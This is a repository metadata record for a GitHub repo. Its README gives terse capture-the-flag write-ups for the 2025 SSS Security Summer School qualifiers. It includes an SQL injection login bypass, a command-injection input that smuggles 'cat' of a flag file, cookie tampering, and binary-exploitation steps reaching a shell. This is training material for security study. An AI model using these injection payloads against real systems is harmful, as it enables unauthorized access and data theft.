{"id":27696873,"url":"https://github.com/ahossu/sss_qualifiers_v12","last_synced_at":"2025-07-01T09:05:39.826Z","repository":{"id":288841708,"uuid":"969316476","full_name":"ahossu/SSS_Qualifiers_v12","owner":"ahossu","description":"The write-ups for the preselection exam of the SSS Security Summer School at UNSTB, Romania, 2025 Edition.","archived":false,"fork":false,"pushed_at":"2025-04-19T22:20:00.000Z","size":18,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-07-01T09:05:30.865Z","etag":null,"topics":["binary-exploitation","ctf","ctf-challenges","ctf-platform","ctf-writeups","cyber-security","cybersecurity","pwn","pwntools","reverse-engineering","web","web-security"],"latest_commit_sha":null,"homepage":"https://security.cs.pub.ro/summer-school/wiki/","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ahossu.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-04-19T21:46:23.000Z","updated_at":"2025-04-19T22:20:03.000Z","dependencies_parsed_at":"2025-04-25T15:13:59.991Z","dependency_job_id":null,"html_url":"https://github.com/ahossu/SSS_Qualifiers_v12","commit_stats":null,"previous_names":["ahossu/sss_qualifiers_v12"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ahossu/SSS_Qualifiers_v12","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v12","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v12/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v12/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v12/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ahossu","download_url":"https://codeload.github.com/ahossu/SSS_Qualifiers_v12/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v12/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":262933261,"owners_count":23386778,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["binary-exploitation","ctf","ctf-challenges","ctf-platform","ctf-writeups","cyber-security","cybersecurity","pwn","pwntools","reverse-engineering","web","web-security"],"created_at":"2025-04-25T15:13:58.668Z","updated_at":"2025-07-01T09:05:39.801Z","avatar_url":"https://github.com/ahossu.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# SSS_Qualifiers_v12\n\n##### 2025 Edition\n\n- **Web: Qualifiers: Sequel Pro**  \n`we use SQL Injection for this as the title suggests`  \n\u0026emsp;`user: admin`  \n\u0026emsp;`pass: ' OR '1' = '1`  \n`the secret appears`\n\n- **Web: Qualifiers: Cake**  \n`we change the value of the FLAG cookie in applepie`  \n`we refresh and we see the cookie updated`  \n`it is containing the flag`\n\n- **Web: Qualifiers: Welcome**  \n`we look at the source code`  \n`first part in:`  \n\u0026emsp;`/static/css/main.css`  \n`second part in:`  \n\u0026emsp;`\u003cp id=\"hidden\" style=\"margin-left:5px;display:inline:float:right\"\u003esvyr_\u003c/p\u003e`  \n`third part in:`  \n\u0026emsp;`/static/hidden.js?v=`  \n`forth part in:`  \n\u0026emsp;`/static/logo.png`\n\n- **Web: Qualifiers: In Your Face**  \n`we look at the source code`  \n`\u003c!-- U1NTe2NhZ2VfdHJhdm9sdGF9Cg== --\u003e`  \n`we apply base64 on this string`\n\n- **Web: Qualifiers: IP Destroyer**  \n`simple command injection to cat the flag.txt`  \n`after searching in multiple the directories we find the flag inside /home/ctf/flag`  \n`so the input to retrieve the flag is: -c 0 8.8.8.8; cat /home/ctf/flag`\n\n- **Binary: Qualifiers: Black Hole**  \n`opened it in IDA`  \n`we see that the flag is printed in /dev/null and it is impossible to retrieve it from that address`  \n`we use gdb to see the flag before it is written in that file`  \n`gdb ./black_hole`  \n`gef➤  break fwrite`  \n`gef➤  run`  \n`gef➤  x/s $rdi`  \n`0x602480:       \"SSS{the_[REDACTED]_see}\"`\n\n- **Binary: Qualifiers: One by One**  \n`opened it in Ghidra and than we extract`  \n`part20 64h; part0 53h; part24 6Fh; part18 6Fh; part3 7Bh; part27 7Dh; part11 6Fh; part13 5Fh; part23 6Ch; part12 66h; part14 74h; part21 5Fh; part9 70h; part26 6Bh; part17 5Fh; part25 63h; part15 68h; part6 63h; part7 68h; part22 62h; part2 53h; part8 69h; part5 5Fh; part19 6Ch; part4 61h; part16 65h; part1 53h; part10 5Fh`  \n`we order them and than we convert them from base64`\n\n- **Binary: Qualifiers: Not Backdoor**  \n`the file not_backdoor.exe is a POSIX tar archive (GNU)`  \n`we extract the not_backdoor than we analyse the code in IDA`  \n`we use the following script to try all XOR possibilities in the function sub_4006B6`  \n`orig = [60, 60, 60, 20, 31, 29, 92, 27, 27, 22, 48, 12, 95, 1, 25, 0, 3, 26, 27, 10, 11, 48, 9, 3, 91, 8, 18, 111]`  \n`for key in range(256):`  \n\u0026emsp;`decoded = ''.join(chr(b ^ key) for b in orig)`  \n\u0026emsp;`print(key, decoded)`  \n`there was one result that matched the format starting with SSS and was the flag`\n\n- **Binary: Qualifiers: Mirror Me**  \n`opened it in IDA`  \n`in max_mirror() function the output is 906609`  \n`we choose 2 numbers with the product 906609: 913 and 993, so we can get to system(\"/bin/sh\");`  \n`then we search for the flag in the system and we find it in ./home/ctf/flag`\n\n- **Binary: Qualifiers: Pinpoint**  \n`opened it in IDA`  \n`.data:0000000000601058 v    dd 53535353h`  \n`this is the value we need to modify`  \n`1398297427 = 0x53585353`  \n`initially v is 0x53535353`  \n`the four bytes are: at address 0x601058 is 0x53, at address 0x601059 is 0x53, at address 0x60105A is 0x53, at address 0x60105B is 0x53`  \n`the only diff between the init value (0x53535353) and the target (0x53585353) is in the third byte (offset 2)`  \n`we only need to change that byte`  \n`offset 2 so we have to modify at 0x601058 + 2 = 0x60105A`  \n`we must change it from 0x53 (83 decimal) to 0x58 (88 decimal)`  \n`0x60105A = 6295642`  \n`so the inputs are 6295642 and 88`  \n`then we search for the flag in the system and we find it in ./home/ctf/flag`\n\n- **Binary: Qualifiers: The Talker**  \n`*(_DWORD *)\u0026s.sa_data[2] = htonl(0x7F000001u); -\u003e sends to localhost`  \n`*(_WORD *)s.sa_data = htons(4444u); -\u003e sends at port 4444`  \n`sleep(10u); -\u003e each 10 seconds`  \n`read_flag(buf, 128LL) reads ../flag into a buffer`  \n`the binary sends to 127.0.0.1:4444 each 10 seconds using sendto()`  \n`we login to connect@141.85.224.99 and we use nc -ul 4444 to listen to 4444 port and we receive the flag`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fahossu%2Fsss_qualifiers_v12","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fahossu%2Fsss_qualifiers_v12","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fahossu%2Fsss_qualifiers_v12/lists"}